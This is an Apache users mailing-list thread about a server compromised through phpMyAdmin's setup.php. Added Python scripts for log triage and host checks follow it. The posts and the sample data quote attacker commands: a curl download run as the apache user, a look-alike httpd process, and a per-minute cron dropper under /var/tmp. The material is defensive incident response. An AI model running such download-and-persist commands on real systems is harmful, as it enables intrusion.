[users@httpd] attack on apache - solved -

2012-01-13 Thread Luisa Ester Navarro

Thanks a lot to everyone who helped me to solve the problem.
I had installed phpmyadmin and they used it to attack my server.
I found this in /var/log/httpd/access_log

Cheers 

Luisa
  

RE: [users@httpd] attack on apache - solved -

2012-01-13 Thread Luisa Ester Navarro

 Date: Fri, 13 Jan 2012 15:32:55 -0500
 To: users@httpd.apache.org
 From: storm...@stormy.ca
 Subject: Re: [users@httpd] attack on apache - solved -
 
 At 04:48 PM 1/13/2012 -0300, you wrote:
 Thanks a lot to everyone who helped me to solve the problem.
 I had installed phpmyadmin and they used it to attack my server.
 I found this in /var/log/httpd/access_log
 
 Was your compile of apache2 prefork or worker?  And could you be a 
 little more explicit with what you found in your logs (without compromising 
 security?)
 
 I'm interested because I have a worker compile of 2.2.17 that I will 
 shortly be changing either to FastCGI or prefork, because of php that 
 requires libapache2-mod-php5, which in turn depends on apache2-mpm-prefork 
 ( 2.0.52) and apache2-mpm-itk.
 
 tnx - paul 
 
 

My apache is compiled with prefork.
My phpmyadmin must be used only from my internal network with user and password
(I thought this). When I was looking at my access_log I saw that it was being
used from an external IP.

The messages in my logfile are:

xx.xxx.xx.xx GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1 200 14049 - 
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
xx.xxx.xxx.xx POST /admin/phpmyadmin/scripts/setup.php HTTP/1.1 200 - 
http://xxx.xx.xx.xx/admin/phpmyadmin/scripts/setup.php\r; Mozilla/4.0 
(compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
 
For now I have just removed some permissions until I find a real solution. I am using
CentOS 5.7.
Cheers

Luisa

 -
 The official User-To-User support forum of the Apache HTTP Server Project.
 See URL:http://httpd.apache.org/userslist.html for more info.
 To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   from the digest: users-digest-unsubscr...@httpd.apache.org
 For additional commands, e-mail: users-h...@httpd.apache.org
 

  

RE: [users@httpd] attack on apache

2012-01-11 Thread Luisa Ester Navarro

From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300

 Date: Mon, 9 Jan 2012 17:30:21 +
 From: tevans...@googlemail.com
 To: users@httpd.apache.org
 Subject: Re: FW: [users@httpd] attack on apache
 
 On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
 luisa2...@hotmail.com wrote:
 
  I didn't have any cronjobs but when I detected the attack I saw one in
  /var/spool/cron
  My logfile says
  User apache:
 
 /var/tmp/.autorun/update /dev/null 21: 2162 Time(s)
 
 personal crontab deleted: 56 Time(s)
 
 personal crontab listed: 1 Time(s)
 
 personal crontab replaced: 1 Time(s)
 
  Thanks
 
 
 Google tells me that this is output from a cpanel perl script -
 probably a crontab editor. crontabs are not evidence of an attack.
 

 You need to show more details of what you think is happening, and why
 you think it is malicious.
 Cheers

Tom

I think it is an attack because I found these commands running on my server
(with owner apache)

/usr/local/apache/bin/httpd -DSFSL
sh -c curl -O http://

I also found a folder named proc in /var/named/chroot. This folder is the same as
/proc, it is updated with the original /proc and I can't delete it.

In /var/log/httpd/error_log I see things like this
sh: del comand no found
sh: xx Permission denied

I need help !

Thanks

Luisa

RE: [users@httpd] attack on apache

2012-01-11 Thread Luisa Ester Navarro

Date: Wed, 11 Jan 2012 21:13:53 +0100
From: jer...@adaptr.nl
To: users@httpd.apache.org
Subject: Re: [users@httpd] attack on apache

On 01/11/2012 09:10 PM, Jaco Kroon wrote:

  On 11/01/12 21:35, Jeroen Geilman wrote:

    In /var/log/httpd/error_log I see things like this
    sh: del comand no found
    sh: xx Permission denied

    I need help !

   1. Stop apache.

   2. investigate which leaky, creaky or lousy PHP script allowed
   this exploit.

   3. remove the bad script.

  4.  Remount /tmp with noexec,nosuid,nodev to prevent the majority
  of these types of exploits.

Surely you noticed that I did not advise him to turn it back on - at
all ? ;)

But yes, distros that don't protect /tmp suck.

-- 
J.

Thanks Jeroen:
any idea how to start researching which is the leaky script?
Cheers
Luisa
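Jeroen's step 2 ("investigate which leaky, creaky or lousy PHP script allowed this exploit") and the setup.php lines Luisa later posted from access_log are the two places a log-side triage helps. The script below is an added example, not code from any poster on this thread. It assumes Apache's "combined" access_log format, 2.2-style error_log lines, that both logs carry server local time, and an /admin/phpmyadmin/ prefix as in Luisa's log; the sample lines, addresses and timestamps are constructed. It flags admin-path requests from outside RFC1918 space, and correlates each "sh: ..." error with the PHP requests received just before it, which is how one narrows down the script that spawned the shell.

```python
"""Log triage for the compromise in this thread: phpMyAdmin's setup.php reached
from outside, and "sh: ... command not found" lines in error_log left by
commands a PHP script spawned through sh -c as the apache user.

Added example, not code from the mailing-list posts.  Assumes Apache's
"combined" access_log format, 2.2-style error_log lines, both logs in server
local time, and an /admin/phpmyadmin/ prefix as in Luisa's log.  All sample
lines, addresses and timestamps are constructed.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# combined: host ident user [time] "method path proto" status bytes "referer" "agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
# 2.2 error_log: [Wed Jan 11 16:02:06 2012] [error] [client 203.0.113.9] message
ERROR_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\] \[(?P<level>\w+)\] (?:\[client (?P<ip>\S+)\] )?(?P<msg>.*)$')
ACCESS_TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
ERROR_TIME_FMT = "%a %b %d %H:%M:%S %Y"

ADMIN_PATHS = ("/admin/phpmyadmin/",)            # internal-only, per the thread
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
SHELL_MARKERS = ("sh: ", "command not found", "Permission denied")

def parse_access(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # %t is when the request was *received*; drop the UTC offset so it compares
    # with error_log's naive local-time stamps.
    rec["time"] = datetime.strptime(rec["time"], ACCESS_TIME_FMT).replace(tzinfo=None)
    rec["status"] = int(rec["status"])
    rec["script"] = rec["path"].split("?", 1)[0]
    return rec

def parse_error_log(lines):
    """-> [(time, client_ip_or_None, message)].  What a PHP-spawned shell writes to
    stderr (e.g. "sh: del: command not found") reaches error_log with no timestamp,
    so such lines inherit the time of the last stamped entry (a heuristic)."""
    entries, last_time = [], None
    for line in lines:
        m = ERROR_RE.match(line)
        if m:
            last_time = datetime.strptime(m.group("time"), ERROR_TIME_FMT)
            entries.append((last_time, m.group("ip"), m.group("msg")))
        elif line.strip() and last_time is not None:
            entries.append((last_time, None, line.strip()))
    return entries

def is_internal(ip):
    try:
        return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)
    except ValueError:
        return False

def external_admin_hits(access_lines):
    """Requests for admin-only paths from outside the internal network, any status."""
    return [(r["ip"], r["method"], r["script"], r["status"])
            for r in map(parse_access, access_lines)
            if r and r["script"].startswith(ADMIN_PATHS) and not is_internal(r["ip"])]

def suspect_scripts(access_lines, error_lines, window=timedelta(seconds=5)):
    """Jeroen's step 2, mechanised: for every shell error, count the PHP requests
    received up to `window` before it (same client when error_log names one).
    -> [((script, method), count)] with the most-implicated script first."""
    requests = [r for r in map(parse_access, access_lines) if r]
    shell_errors = [e for e in parse_error_log(error_lines)
                    if any(mark in e[2] for mark in SHELL_MARKERS)]
    counts = {}
    for when, client, _msg in shell_errors:
        for req in requests:
            if not req["script"].endswith(".php"):
                continue
            if client is not None and req["ip"] != client:
                continue
            if timedelta(0) <= when - req["time"] <= window:
                key = (req["script"], req["method"])
                counts[key] = counts.get(key, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))

# Constructed samples: 203.0.113.9 stands in for the attacker, 198.51.100.4 for
# the victim host; neither is real traffic.
ACCESS_SAMPLE = """\
192.168.1.20 - - [11/Jan/2012:16:01:50 -0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Jan/2012:16:01:57 -0300] "GET /admin/phpmyadmin/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Jan/2012:16:02:03 -0300] "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 200 14049 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.9 - - [11/Jan/2012:16:02:05 -0300] "POST /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 200 - "http://198.51.100.4/admin/phpmyadmin/scripts/setup.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.9 - - [11/Jan/2012:16:03:40 -0300] "GET /images/logo.png HTTP/1.1" 404 290 "-" "Mozilla/5.0"
""".splitlines()
ERROR_SAMPLE = """\
[Wed Jan 11 16:02:06 2012] [error] [client 203.0.113.9] File does not exist: /var/www/html/favicon.ico
sh: del: command not found
sh: /var/tmp/.autorun/update: Permission denied
[Wed Jan 11 16:03:40 2012] [error] [client 203.0.113.9] File does not exist: /var/www/html/images/logo.png
""".splitlines()

if __name__ == "__main__":
    for hit in external_admin_hits(ACCESS_SAMPLE):
        print("external admin hit:", hit)
    for (script, method), n in suspect_scripts(ACCESS_SAMPLE, ERROR_SAMPLE):
        print("suspect: %s %s, %d shell error(s) within window" % (method, script, n))
```

On a real box feed it `open("/var/log/httpd/access_log").read().splitlines()` and the same for error_log. The correlation is driven by timestamps, not file order: an access_log line is written when the request finishes, so the request that spawned the shell is logged after the shell's stderr appears in error_log. The inherited-timestamp trick for unstamped "sh:" lines is only as good as the density of stamped entries around them, which is why the result is a ranked list of candidates to read, not a verdict.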
  

[users@httpd] can not send

2012-01-09 Thread Luisa Ester Navarro
You reject my messages


Re: [users@httpd] can not send

2012-01-09 Thread Luisa Ester Navarro
Thanks Rambo
  I am trying to send a message with the description of my problem,
and it is always rejected (for spam or something like this), for this reason I
send a short message. It is my first contact with the list. I used copy
and paste to send a part of my log files. Is this the problem? Or is
there another thing that I don't know?
Thanks again


2012/1/9 Marcin 'Rambo' Roguski ra...@id.uw.edu.pl

 On Mon, 9 Jan 2012 09:13:09 -0300
 Luisa Ester Navarro luisaester2...@gmail.com wrote:

  you reject my messages

 Apparently not

 --
 Marcin 'Rambo' Roguski ra...@id.uw.edu.pl


[users@httpd] attack on apache

2012-01-09 Thread Luisa Ester Navarro

My server is being attacked. I think it is from apache because I have found
commands running with the owner apache.
My httpd is in /usr/sbin and they run /usr/local/apache/bin/httpd -DSFSL
and sh -c curl -o http 

They also run every minute a crontab from /var/spool/cron and I didn't have
anything there.
I am using CentOS 5.7 and httpd-2.2.3.53-el5.centos.3 and my system is up to date.
Can someone help me?
Thanks in advance

Luisa
  

FW: [users@httpd] attack on apache

2012-01-09 Thread Luisa Ester Navarro

I didn't have any cronjobs but when I detected the attack I saw one in
/var/spool/cron
My logfile says
User apache:
   /var/tmp/.autorun/update /dev/null 21: 2162 Time(s)
   personal crontab deleted: 56 Time(s)
   personal crontab listed: 1 Time(s)
   personal crontab replaced: 1 Time(s)
Thanks

 Date: Mon, 9 Jan 2012 18:05:38 +0100
 From: i...@simonecaruso.com
 To: users@httpd.apache.org
 CC: luisa2...@hotmail.com
 Subject: Re: [users@httpd] attack on apache
 
 On 09/01/2012 16:11, Luisa Ester Navarro wrote:
  My server is being attacked. I think it is from apache because I have found
  commands running with the owner apache.
  My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL 
  and  sh -c curl -o http 
  
 
 I don't think they exploited apache, maybe an application level bug. Are the
 cronjobs running as the apache user?
 
 
 -- 
 Simone Caruso
 IT Consultant
 +39 349 65 90 805
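Luisa's original observation (a process named httpd running from /usr/local/apache/bin while the packaged binary lives in /usr/sbin, plus an apache crontab calling /var/tmp/.autorun/update), Simone's question about which user the cron jobs run as, and Jaco's "remount /tmp with noexec,nosuid,nodev" all boil down to three host-side checks. The script below is an added example, not code from any poster. Each check takes text so it can be fed the output of `ps -eo user,pid,ppid,args`, /etc/mtab (or /proc/mounts) and `crontab -u apache -l` captured from the suspect box; the packaged httpd path follows the thread, and the PIDs, curl URL and mount layout in the samples are invented.

```python
"""Host-side checks for what Luisa reported and Simone and Jaco asked about:
processes owned by apache that are not the packaged httpd, a crontab for the
web user, and /tmp or /var/tmp mounted without noexec,nosuid,nodev.

Added example, not code from any poster.  Each check takes text so it can be
fed `ps -eo user,pid,ppid,args`, /etc/mtab and `crontab -u apache -l` output
captured from the box (or constructed samples, as below).  The packaged httpd
path follows the thread (/usr/sbin/httpd); the sample data is made up.
"""

PACKAGED_HTTPD = "/usr/sbin/httpd"
WEB_USER = "apache"
TMP_MOUNTS = ("/tmp", "/var/tmp")
WANTED_TMP_OPTS = {"noexec", "nosuid", "nodev"}

def rogue_web_processes(ps_text, web_user=WEB_USER, httpd=PACKAGED_HTTPD):
    """From `ps -eo user,pid,ppid,args` output (header included): web-user
    processes whose command is not the packaged httpd.  Comparing the full path
    is what catches a look-alike such as /usr/local/apache/bin/httpd; argv[0]
    can be forged, so confirm hits with readlink /proc/PID/exe before acting."""
    rogues = []
    for line in ps_text.splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        if user == web_user and args.split()[0] != httpd:
            rogues.append((int(pid), int(ppid), args))
    return rogues

def tmp_mounts_missing_hardening(mtab_text, mounts=TMP_MOUNTS, wanted=WANTED_TMP_OPTS):
    """From /etc/mtab or /proc/mounts text: which of `mounts` lack any of
    noexec,nosuid,nodev.  A path that is not its own mount point inherits the
    parent filesystem's options (normally exec), so it is reported too."""
    opts_by_mount = {}
    for line in mtab_text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            opts_by_mount[fields[1]] = set(fields[3].split(","))
    report = {}
    for mp in mounts:
        if mp not in opts_by_mount:
            report[mp] = "not a separate mount"
        else:
            missing = wanted - opts_by_mount[mp]
            if missing:
                report[mp] = "missing " + ",".join(sorted(missing))
    return report

def crontab_commands(crontab_text):
    """Commands scheduled in a user crontab (e.g. /var/spool/cron/apache),
    ignoring comments and VAR=value lines.  The web user should have none."""
    cmds = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                      # @reboot, @hourly, ...
            fields = line.split(None, 1)
        else:                                         # min hour dom mon dow cmd
            fields = line.split(None, 5)
        if len(fields) == (2 if line.startswith("@") else 6):
            cmds.append(fields[-1])
    return cmds

# Constructed samples; PIDs, the curl URL and the mount layout are invented.
PS_SAMPLE = """\
USER       PID  PPID COMMAND
root      2101     1 /usr/sbin/httpd
apache    2105  2101 /usr/sbin/httpd
apache    2106  2101 /usr/sbin/httpd
apache    3187     1 /usr/local/apache/bin/httpd -DSFSL
apache    3190  3187 sh -c curl -O http://198.51.100.4/x/update
"""
MTAB_SAMPLE = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw 0 0
tmpfs /dev/shm tmpfs rw 0 0
"""
CRONTAB_SAMPLE = """\
# DO NOT EDIT THIS FILE - edit the master and reinstall.
MAILTO=""
* * * * * /var/tmp/.autorun/update >/dev/null 2>&1
"""

if __name__ == "__main__":
    for pid, ppid, args in rogue_web_processes(PS_SAMPLE):
        print("rogue %s process pid=%d ppid=%d: %s" % (WEB_USER, pid, ppid, args))
    for mp, problem in tmp_mounts_missing_hardening(MTAB_SAMPLE).items():
        print("%s: %s" % (mp, problem))
    for cmd in crontab_commands(CRONTAB_SAMPLE):
        print("%s crontab runs: %s" % (WEB_USER, cmd))
```

Two things worth noting from the sample output. The look-alike httpd has ppid 1, i.e. it was daemonised rather than forked by the real master (pid 2101), which is a second tell independent of the path. And Jaco's remount (`mount -o remount,noexec,nosuid,nodev /tmp`) only covers /tmp; the dropper in this thread lived under /var/tmp, so that needs the same treatment, and a /var/tmp that is not a separate filesystem cannot be given those options at all without becoming one. Test noexec before relying on it: some package scripts expect to execute from /tmp.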